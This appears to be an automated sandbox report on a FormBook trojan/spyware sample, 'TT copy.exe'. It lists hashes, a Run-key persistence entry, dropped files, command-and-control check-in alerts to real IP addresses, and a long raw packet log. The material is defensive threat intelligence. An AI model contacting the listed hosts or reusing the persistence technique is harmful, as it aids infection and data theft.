• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@10/2@16/9
                                                                                                          EGA Information:
                                                                                                          • Successful, ratio: 100%
                                                                                                          HDC Information:
                                                                                                          • Successful, ratio: 62.2% (good quality ratio 57.3%)
                                                                                                          • Quality average: 73.5%
                                                                                                          • Quality standard deviation: 30.4%
                                                                                                          HCA Information:
                                                                                                          • Successful, ratio: 100%
                                                                                                          • Number of executed functions: 155
                                                                                                          • Number of non-executed functions: 175
                                                                                                          Cookbook Comments:
                                                                                                          • Found application associated with file extension: .exe
                                                                                                          • Adjust boot time
                                                                                                          • Enable AMSI
                                                                                                          • Override analysis time to 240s for rundll32
                                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                                                                          • Excluded domains from analysis (whitelisted): www.bing.com, ris.api.iris.microsoft.com, fs.microsoft.com, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
• Not all processes were analyzed, report is missing behavior information
                                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
08:15:27 | API Interceptor | 1x Sleep call for process: TT copy.exe modified
08:17:19 | API Interceptor | 1x Sleep call for process: explorer.exe modified
08:17:19 | Autostart | Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run PTHDNLT C:\Program Files (x86)\Euz8d\b60tqzo4nhevx.exe
                                                                                                          • 166.93.191.7
                                                                                                          Shipment Consignment Notification-#U00a0 6183111.exeGet hashmaliciousBrowse
                                                                                                          • 107.187.31.215
                                                                                                          4I9zpWsNRBGet hashmaliciousBrowse
                                                                                                          • 205.164.26.4
                                                                                                          XWE736wRPvGet hashmaliciousBrowse
                                                                                                          • 192.177.167.70
                                                                                                          dD2niauWUc.exeGet hashmaliciousBrowse
                                                                                                          • 104.164.49.18
                                                                                                          thMtniHOSgGet hashmaliciousBrowse
                                                                                                          • 45.39.166.101
                                                                                                          SecuriteInfo.com.X97M.DownLoader.535.15867.xlsGet hashmaliciousBrowse
                                                                                                          • 107.187.232.27
                                                                                                          SecuriteInfo.com.X97M.DownLoader.535.950.xlsGet hashmaliciousBrowse
                                                                                                          • 107.187.232.27
                                                                                                          SecuriteInfo.com.X97M.DownLoader.535.20853.xlsGet hashmaliciousBrowse
                                                                                                          • 107.187.232.27
                                                                                                          SecuriteInfo.com.X97M.DownLoader.535.18563.xlsGet hashmaliciousBrowse
                                                                                                          • 107.187.232.27
                                                                                                          SecuriteInfo.com.X97M.DownLoader.535.9316.xlsGet hashmaliciousBrowse
                                                                                                          • 107.187.232.27
                                                                                                          SecuriteInfo.com.X97M.DownLoader.535.31748.xlsGet hashmaliciousBrowse
                                                                                                          • 107.187.232.27
                                                                                                          SecuriteInfo.com.X97M.DownLoader.535.31145.xlsGet hashmaliciousBrowse
                                                                                                          • 107.187.232.27
                                                                                                          SecuriteInfo.com.X97M.DownLoader.535.27076.xlsGet hashmaliciousBrowse
                                                                                                          • 107.187.232.27
                                                                                                          SecuriteInfo.com.X97M.DownLoader.535.4651.xlsGet hashmaliciousBrowse
                                                                                                          • 107.187.232.27
                                                                                                          SecuriteInfo.com.X97M.DownLoader.535.13662.xlsGet hashmaliciousBrowse
                                                                                                          • 107.187.232.27
                                                                                                          SecuriteInfo.com.X97M.DownLoader.535.26800.xlsGet hashmaliciousBrowse
                                                                                                          • 107.187.232.27
                                                                                                          SecuriteInfo.com.X97M.DownLoader.535.21931.xlsGet hashmaliciousBrowse
                                                                                                          • 107.187.232.27
                                                                                                          SecuriteInfo.com.X97M.DownLoader.535.13529.xlsGet hashmaliciousBrowse
                                                                                                          • 107.187.232.27
                                                                                                          COGENT-174USTropicalV1.armGet hashmaliciousBrowse
                                                                                                          • 206.234.73.168
                                                                                                          arm-20220602-1945Get hashmaliciousBrowse
                                                                                                          • 149.113.122.88
                                                                                                          armGet hashmaliciousBrowse
                                                                                                          • 38.183.120.14
                                                                                                          8xq7hsMfn0Get hashmaliciousBrowse
                                                                                                          • 149.18.7.172
                                                                                                          djWXcpcbUlGet hashmaliciousBrowse
                                                                                                          • 23.237.86.148
                                                                                                          r4z0r.armGet hashmaliciousBrowse
                                                                                                          • 38.83.42.147
                                                                                                          KWxsuEuN4yGet hashmaliciousBrowse
                                                                                                          • 38.137.84.147
                                                                                                          YEuBbqz209Get hashmaliciousBrowse
                                                                                                          • 23.154.10.238
                                                                                                          b1JMHtDdwqGet hashmaliciousBrowse
                                                                                                          • 38.10.205.225
                                                                                                          mipsGet hashmaliciousBrowse
                                                                                                          • 38.8.9.195
                                                                                                          Nova ozljeda 034245627782.DOC.exeGet hashmaliciousBrowse
                                                                                                          • 38.55.142.232
                                                                                                          BILL OF LADING-CI-PL-BL_xlsx.exeGet hashmaliciousBrowse
                                                                                                          • 154.23.227.120
                                                                                                          arm7Get hashmaliciousBrowse
                                                                                                          • 149.57.170.179
                                                                                                          x86Get hashmaliciousBrowse
                                                                                                          • 149.57.170.179
                                                                                                          armGet hashmaliciousBrowse
                                                                                                          • 149.57.170.179
                                                                                                          #U00aeInvoice Payment#U00ae.htmlGet hashmaliciousBrowse
                                                                                                          • 38.34.185.163
                                                                                                          c9O21NXLpHGet hashmaliciousBrowse
                                                                                                          • 206.238.164.50
                                                                                                          x86Get hashmaliciousBrowse
                                                                                                          • 149.110.96.157
                                                                                                          4PVahP5GIaGet hashmaliciousBrowse
                                                                                                          • 38.127.150.131
                                                                                                          arm6Get hashmaliciousBrowse
                                                                                                          • 38.216.188.67
                                                                                                          No context
                                                                                                          No context
                                                                                                          Process:C:\Users\user\Desktop\TT copy.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1308
                                                                                                          Entropy (8bit):5.345811588615766
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84FsXE8:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzu
                                                                                                          MD5:2E016B886BDB8389D2DD0867BE55F87B
                                                                                                          SHA1:25D28EF2ACBB41764571E06E11BF4C05DD0E2F8B
                                                                                                          SHA-256:1D037CF00A8849E6866603297F85D3DABE09535E72EDD2636FB7D0F6C7DA3427
                                                                                                          SHA-512:C100729153954328AA2A77EECB2A3CBD03CB7E8E23D736000F890B17AAA50BA87745E30FB9E2B0D61E16DCA45694C79B4CE09B9F4475220BEB38CAEA546CFC2A
                                                                                                          Malicious:true
                                                                                                          Reputation:high, very likely benign file
                                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                                                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                          Category:dropped
                                                                                                          Size (bytes):40960
                                                                                                          Entropy (8bit):0.792852251086831
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                                          MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                                          SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                                          SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                                          SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                                          Malicious:false
                                                                                                          Reputation:high, very likely benign file
                                                                                                          Preview:SQLite format
                                                                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                          Entropy (8bit):7.846879588611659
                                                                                                          TrID:
                                                                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                          • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                          • DOS Executable Generic (2002/1) 0.01%
                                                                                                          File name:TT copy.exe
                                                                                                          File size:661504
                                                                                                          MD5:6443c909d7e8034f945f3e1dc138a046
                                                                                                          SHA1:a8a4d0653f3598cd477e5887cf12b3ed33625898
                                                                                                          SHA256:de1caed83e7085b2ee79d77ea41b9cfa079182680e7db2c1a8d3cedbc2ac2676
                                                                                                          SHA512:cb15a3039678a6dccfdaf91c3adad44ae243f9a7072bc361807fbc116e8e131fb6b1a038f954558bdc33f5097039f4deb03a717563b3cd0fae88bf6376e88217
                                                                                                          SSDEEP:12288:gxcggFvvr8qAs3eNmNapF2Gmolguwa9R6pes0CWB9+YOI/I:WEvrBAs3emE5WulGp3xaGaI
                                                                                                          TLSH:6EE401A8B2B79E13D5255776D1F2026D03F16582E132E3C71FDA52CA1A027E54EC1F8B
                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0..............,... ...@....@.. ....................................@................................
                                                                                                          Icon Hash:00828e8e8686b000
                                                                                                          Entrypoint:0x4a2cee
                                                                                                          Entrypoint Section:.text
                                                                                                          Digitally signed:false
                                                                                                          Imagebase:0x400000
                                                                                                          Subsystem:windows gui
                                                                                                          Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                                                                                                          DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                                          Time Stamp:0xE98C9EE8 [Mon Mar 1 18:37:28 2094 UTC]
                                                                                                          TLS Callbacks:
                                                                                                          CLR (.Net) Version:v4.0.30319
                                                                                                          OS Version Major:4
                                                                                                          OS Version Minor:0
                                                                                                          File Version Major:4
                                                                                                          File Version Minor:0
                                                                                                          Subsystem Version Major:4
                                                                                                          Subsystem Version Minor:0
                                                                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                          Instruction
                                                                                                          jmp dword ptr [00402000h]
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0xa2ca0 | 0x4b | .text |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xa4000 | 0x600 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xa6000 | 0xc | .reloc |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0xa2c4f | 0x1c | .text |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |
| Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|
| .text | 0x2000 | 0xa0cf4 | 0xa0e00 | False | 0.918677459693 | data | 7.8550082389 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ |
| .rsrc | 0xa4000 | 0x600 | 0x600 | False | 0.430338541667 | data | 4.19980462584 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .reloc | 0xa6000 | 0xc | 0x200 | False | 0.044921875 | data | 0.101910425663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |
| Name | RVA | Size | Type | Language | Country |
|---|---|---|---|---|---|
| RT_VERSION | 0xa40a0 | 0x374 | data | | |
| RT_MANIFEST | 0xa4414 | 0x1ea | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators | | |
| DLL | Import |
|---|---|
| mscoree.dll | _CorExeMain |
| Description | Data |
|---|---|
| Translation | 0x0000 0x04b0 |
| LegalCopyright | Copyright 2019 |
| Assembly Version | 1.0.0.0 |
| InternalName | StreamingContextSta.exe |
| FileVersion | 1.0.0.0 |
| CompanyName | |
| LegalTrademarks | |
| Comments | |
| ProductName | RandomFieldGenerator |
| ProductVersion | 1.0.0.0 |
| FileDescription | RandomFieldGenerator |
| OriginalFilename | StreamingContextSta.exe |
| Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|---|---|---|
| 06/03/22-08:17:26.941837 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49786 | 80 | 192.168.2.4 | 18.193.36.153 |
| 06/03/22-08:19:23.968199 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49893 | 80 | 192.168.2.4 | 154.36.145.110 |
| 06/03/22-08:16:58.893159 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49780 | 80 | 192.168.2.4 | 185.254.241.173 |
| 06/03/22-08:16:58.893159 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49780 | 80 | 192.168.2.4 | 185.254.241.173 |
| 06/03/22-08:17:26.941837 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49786 | 80 | 192.168.2.4 | 18.193.36.153 |
| 06/03/22-08:19:23.968199 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49893 | 80 | 192.168.2.4 | 154.36.145.110 |
| 06/03/22-08:19:29.232565 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49896 | 80 | 192.168.2.4 | 34.102.136.180 |
| 06/03/22-08:19:29.232565 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49896 | 80 | 192.168.2.4 | 34.102.136.180 |
| 06/03/22-08:16:58.893159 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49780 | 80 | 192.168.2.4 | 185.254.241.173 |
| 06/03/22-08:17:26.941837 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49786 | 80 | 192.168.2.4 | 18.193.36.153 |
| 06/03/22-08:19:29.232565 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49896 | 80 | 192.168.2.4 | 34.102.136.180 |
| 06/03/22-08:19:23.968199 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49893 | 80 | 192.168.2.4 | 154.36.145.110 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                          Jun 3, 2022 08:17:48.809325933 CEST8049823198.44.241.20192.168.2.4
                                                                                                          Jun 3, 2022 08:17:48.809709072 CEST4982380192.168.2.4198.44.241.20
                                                                                                          Jun 3, 2022 08:17:48.809731960 CEST4982380192.168.2.4198.44.241.20
                                                                                                          Jun 3, 2022 08:17:48.810147047 CEST4982380192.168.2.4198.44.241.20
                                                                                                          Jun 3, 2022 08:17:48.810195923 CEST4982480192.168.2.4198.44.241.20
                                                                                                          Jun 3, 2022 08:17:49.014390945 CEST8049824198.44.241.20192.168.2.4
                                                                                                          Jun 3, 2022 08:17:49.016530037 CEST4982480192.168.2.4198.44.241.20
                                                                                                          Jun 3, 2022 08:17:49.017874002 CEST4982480192.168.2.4198.44.241.20
                                                                                                          Jun 3, 2022 08:17:49.018563986 CEST8049823198.44.241.20192.168.2.4
                                                                                                          Jun 3, 2022 08:17:49.018598080 CEST8049823198.44.241.20192.168.2.4
                                                                                                          Jun 3, 2022 08:17:49.019500971 CEST4982380192.168.2.4198.44.241.20
                                                                                                          Jun 3, 2022 08:17:49.024636984 CEST4982580192.168.2.4198.44.241.20
                                                                                                          Jun 3, 2022 08:17:49.218827009 CEST8049824198.44.241.20192.168.2.4
                                                                                                          Jun 3, 2022 08:17:49.218854904 CEST8049824198.44.241.20192.168.2.4
                                                                                                          Jun 3, 2022 08:17:49.218921900 CEST8049824198.44.241.20192.168.2.4
                                                                                                          Jun 3, 2022 08:17:49.218961954 CEST4982480192.168.2.4198.44.241.20
                                                                                                          Jun 3, 2022 08:17:49.219019890 CEST4982480192.168.2.4198.44.241.20
                                                                                                          Jun 3, 2022 08:17:49.229768038 CEST8049825198.44.241.20192.168.2.4
                                                                                                          Jun 3, 2022 08:17:49.230441093 CEST4982580192.168.2.4198.44.241.20
                                                                                                          Jun 3, 2022 08:17:49.230521917 CEST4982580192.168.2.4198.44.241.20
                                                                                                          Jun 3, 2022 08:17:49.419919968 CEST8049824198.44.241.20192.168.2.4
                                                                                                          Jun 3, 2022 08:17:49.419945955 CEST8049824198.44.241.20192.168.2.4
                                                                                                          Jun 3, 2022 08:17:49.419962883 CEST8049824198.44.241.20192.168.2.4
                                                                                                          Jun 3, 2022 08:17:49.420046091 CEST4982480192.168.2.4198.44.241.20
                                                                                                          Jun 3, 2022 08:17:49.420099020 CEST8049824198.44.241.20192.168.2.4
                                                                                                          Jun 3, 2022 08:17:49.420269012 CEST8049824198.44.241.20192.168.2.4
                                                                                                          Jun 3, 2022 08:17:49.420337915 CEST8049824198.44.241.20192.168.2.4
                                                                                                          Jun 3, 2022 08:17:49.438215017 CEST8049825198.44.241.20192.168.2.4
                                                                                                          Jun 3, 2022 08:17:49.438241005 CEST8049825198.44.241.20192.168.2.4
                                                                                                          Jun 3, 2022 08:17:49.438254118 CEST8049825198.44.241.20192.168.2.4
                                                                                                          Jun 3, 2022 08:17:49.438541889 CEST4982580192.168.2.4198.44.241.20
                                                                                                          Jun 3, 2022 08:17:49.438605070 CEST4982580192.168.2.4198.44.241.20
                                                                                                          Jun 3, 2022 08:17:49.622168064 CEST8049824198.44.241.20192.168.2.4
                                                                                                          Jun 3, 2022 08:17:49.622190952 CEST8049824198.44.241.20192.168.2.4
                                                                                                          Jun 3, 2022 08:17:49.645550966 CEST8049825198.44.241.20192.168.2.4
                                                                                                          Jun 3, 2022 08:17:54.877490997 CEST4983580192.168.2.4107.187.232.173
                                                                                                          Jun 3, 2022 08:17:55.043728113 CEST8049835107.187.232.173192.168.2.4
                                                                                                          Jun 3, 2022 08:17:55.044131994 CEST4983580192.168.2.4107.187.232.173
                                                                                                          Jun 3, 2022 08:17:55.044303894 CEST4983580192.168.2.4107.187.232.173
                                                                                                          Jun 3, 2022 08:17:55.044327974 CEST4983580192.168.2.4107.187.232.173
                                                                                                          Jun 3, 2022 08:17:55.044770956 CEST4983680192.168.2.4107.187.232.173
                                                                                                          Jun 3, 2022 08:17:55.210653067 CEST8049835107.187.232.173192.168.2.4
                                                                                                          Jun 3, 2022 08:17:55.211394072 CEST8049835107.187.232.173192.168.2.4
                                                                                                          Jun 3, 2022 08:17:55.211483955 CEST4983580192.168.2.4107.187.232.173
                                                                                                          Jun 3, 2022 08:17:55.223176956 CEST8049836107.187.232.173192.168.2.4
                                                                                                          Jun 3, 2022 08:17:55.223376036 CEST4983680192.168.2.4107.187.232.173
                                                                                                          Jun 3, 2022 08:17:55.225189924 CEST4983680192.168.2.4107.187.232.173
                                                                                                          Jun 3, 2022 08:17:55.225615025 CEST4983780192.168.2.4107.187.232.173
                                                                                                          Jun 3, 2022 08:17:55.392237902 CEST8049837107.187.232.173192.168.2.4
                                                                                                          Jun 3, 2022 08:17:55.392379999 CEST4983780192.168.2.4107.187.232.173
                                                                                                          Jun 3, 2022 08:17:55.392704964 CEST4983780192.168.2.4107.187.232.173
                                                                                                          Jun 3, 2022 08:17:55.403311014 CEST8049836107.187.232.173192.168.2.4
                                                                                                          Jun 3, 2022 08:17:55.403341055 CEST8049836107.187.232.173192.168.2.4
                                                                                                          Jun 3, 2022 08:17:55.403357983 CEST8049836107.187.232.173192.168.2.4
                                                                                                          Jun 3, 2022 08:17:55.403441906 CEST4983680192.168.2.4107.187.232.173
                                                                                                          Jun 3, 2022 08:17:55.403500080 CEST4983680192.168.2.4107.187.232.173
                                                                                                          Jun 3, 2022 08:17:55.561633110 CEST8049837107.187.232.173192.168.2.4
                                                                                                          Jun 3, 2022 08:17:55.561655998 CEST8049837107.187.232.173192.168.2.4
                                                                                                          Jun 3, 2022 08:17:55.561887026 CEST4983780192.168.2.4107.187.232.173
                                                                                                          Jun 3, 2022 08:17:55.561914921 CEST4983780192.168.2.4107.187.232.173
                                                                                                          Jun 3, 2022 08:17:55.581384897 CEST8049836107.187.232.173192.168.2.4
                                                                                                          Jun 3, 2022 08:17:55.581613064 CEST4983680192.168.2.4107.187.232.173
                                                                                                          Jun 3, 2022 08:17:55.581712008 CEST8049836107.187.232.173192.168.2.4
                                                                                                          Jun 3, 2022 08:17:55.581774950 CEST4983680192.168.2.4107.187.232.173
                                                                                                          Jun 3, 2022 08:17:55.581792116 CEST8049836107.187.232.173192.168.2.4
                                                                                                          Jun 3, 2022 08:17:55.581904888 CEST8049836107.187.232.173192.168.2.4
                                                                                                          Jun 3, 2022 08:17:55.728307009 CEST8049837107.187.232.173192.168.2.4
                                                                                                          Jun 3, 2022 08:17:55.760027885 CEST8049836107.187.232.173192.168.2.4
                                                                                                          Jun 3, 2022 08:17:55.760061026 CEST8049836107.187.232.173192.168.2.4
                                                                                                          Jun 3, 2022 08:17:55.760283947 CEST8049836107.187.232.173192.168.2.4
                                                                                                          Jun 3, 2022 08:18:00.775405884 CEST4983880192.168.2.4172.16.0.13
                                                                                                          Jun 3, 2022 08:18:03.813107014 CEST4983880192.168.2.4172.16.0.13
                                                                                                          Jun 3, 2022 08:18:09.813579082 CEST4983880192.168.2.4172.16.0.13
                                                                                                          Jun 3, 2022 08:18:23.456084013 CEST4988380192.168.2.4172.16.0.13
                                                                                                          Jun 3, 2022 08:18:24.883169889 CEST4988480192.168.2.4172.16.0.13
                                                                                                          Jun 3, 2022 08:18:26.455562115 CEST4988380192.168.2.4172.16.0.13
                                                                                                          Jun 3, 2022 08:18:27.877589941 CEST4988480192.168.2.4172.16.0.13
                                                                                                          Jun 3, 2022 08:18:32.456053019 CEST4988380192.168.2.4172.16.0.13
                                                                                                          Jun 3, 2022 08:18:33.878137112 CEST4988480192.168.2.4172.16.0.13
                                                                                                          Jun 3, 2022 08:18:46.478252888 CEST4988580192.168.2.4172.16.0.13
                                                                                                          Jun 3, 2022 08:18:48.978605986 CEST4988680192.168.2.4172.16.0.13
                                                                                                          Jun 3, 2022 08:18:49.488709927 CEST4988580192.168.2.4172.16.0.13
                                                                                                          Jun 3, 2022 08:18:49.617053986 CEST8049824198.44.241.20192.168.2.4
                                                                                                          Jun 3, 2022 08:18:49.617072105 CEST8049824198.44.241.20192.168.2.4
                                                                                                          Jun 3, 2022 08:18:49.617213964 CEST4982480192.168.2.4198.44.241.20
                                                                                                          Jun 3, 2022 08:18:49.618309975 CEST4982480192.168.2.4198.44.241.20
                                                                                                          Jun 3, 2022 08:18:51.990520954 CEST4988680192.168.2.4172.16.0.13
                                                                                                          Jun 3, 2022 08:18:55.551909924 CEST4988580192.168.2.4172.16.0.13
                                                                                                          Jun 3, 2022 08:18:57.989511013 CEST4988680192.168.2.4172.16.0.13
                                                                                                          Jun 3, 2022 08:19:10.028788090 CEST4988780192.168.2.4172.16.0.13
                                                                                                          Jun 3, 2022 08:19:13.037627935 CEST4988780192.168.2.4172.16.0.13
                                                                                                          Jun 3, 2022 08:19:18.145947933 CEST4988880192.168.2.423.227.38.74
                                                                                                          Jun 3, 2022 08:19:18.162981033 CEST804988823.227.38.74192.168.2.4
                                                                                                          Jun 3, 2022 08:19:18.163197041 CEST4988880192.168.2.423.227.38.74
                                                                                                          Jun 3, 2022 08:19:18.163798094 CEST4988880192.168.2.423.227.38.74
                                                                                                          Jun 3, 2022 08:19:18.163846016 CEST4988880192.168.2.423.227.38.74
                                                                                                          Jun 3, 2022 08:19:18.164807081 CEST4988980192.168.2.423.227.38.74
                                                                                                          Jun 3, 2022 08:19:18.180922031 CEST804988823.227.38.74192.168.2.4
                                                                                                          Jun 3, 2022 08:19:18.181655884 CEST804988923.227.38.74192.168.2.4
                                                                                                          Jun 3, 2022 08:19:18.181678057 CEST804988823.227.38.74192.168.2.4
                                                                                                          Jun 3, 2022 08:19:18.181813955 CEST4988980192.168.2.423.227.38.74
                                                                                                          Jun 3, 2022 08:19:18.181883097 CEST4988880192.168.2.423.227.38.74
                                                                                                          Jun 3, 2022 08:19:18.184734106 CEST4988980192.168.2.423.227.38.74
                                                                                                          Jun 3, 2022 08:19:18.186062098 CEST4989080192.168.2.423.227.38.74
                                                                                                          Jun 3, 2022 08:19:18.201057911 CEST804988923.227.38.74192.168.2.4
                                                                                                          Jun 3, 2022 08:19:18.201112986 CEST804988923.227.38.74192.168.2.4
                                                                                                          Jun 3, 2022 08:19:18.201122046 CEST804988923.227.38.74192.168.2.4
                                                                                                          Jun 3, 2022 08:19:18.201143026 CEST804988923.227.38.74192.168.2.4
                                                                                                          Jun 3, 2022 08:19:18.201150894 CEST804988923.227.38.74192.168.2.4
                                                                                                          Jun 3, 2022 08:19:18.201159954 CEST804988923.227.38.74192.168.2.4
                                                                                                          Jun 3, 2022 08:19:18.201196909 CEST804988923.227.38.74192.168.2.4
                                                                                                          Jun 3, 2022 08:19:18.201212883 CEST804988923.227.38.74192.168.2.4
                                                                                                          Jun 3, 2022 08:19:18.201225996 CEST804988923.227.38.74192.168.2.4
                                                                                                          Jun 3, 2022 08:19:18.201267958 CEST804988923.227.38.74192.168.2.4
                                                                                                          Jun 3, 2022 08:19:18.201390028 CEST4988980192.168.2.423.227.38.74
                                                                                                          Jun 3, 2022 08:19:18.201456070 CEST4988980192.168.2.423.227.38.74
                                                                                                          Jun 3, 2022 08:19:18.202415943 CEST804989023.227.38.74192.168.2.4
                                                                                                          Jun 3, 2022 08:19:18.202543020 CEST4989080192.168.2.423.227.38.74
                                                                                                          Jun 3, 2022 08:19:18.202693939 CEST4989080192.168.2.423.227.38.74
                                                                                                          Jun 3, 2022 08:19:18.217741966 CEST804988923.227.38.74192.168.2.4
                                                                                                          Jun 3, 2022 08:19:18.217771053 CEST804988923.227.38.74192.168.2.4
                                                                                                          Jun 3, 2022 08:19:18.217791080 CEST804988923.227.38.74192.168.2.4
                                                                                                          Jun 3, 2022 08:19:18.217813969 CEST804988923.227.38.74192.168.2.4
                                                                                                          Jun 3, 2022 08:19:18.217837095 CEST804988923.227.38.74192.168.2.4
                                                                                                          Jun 3, 2022 08:19:18.217855930 CEST804988923.227.38.74192.168.2.4
                                                                                                          Jun 3, 2022 08:19:18.217874050 CEST804988923.227.38.74192.168.2.4
                                                                                                          Jun 3, 2022 08:19:18.217921972 CEST804988923.227.38.74192.168.2.4
                                                                                                          Jun 3, 2022 08:19:18.217945099 CEST804988923.227.38.74192.168.2.4
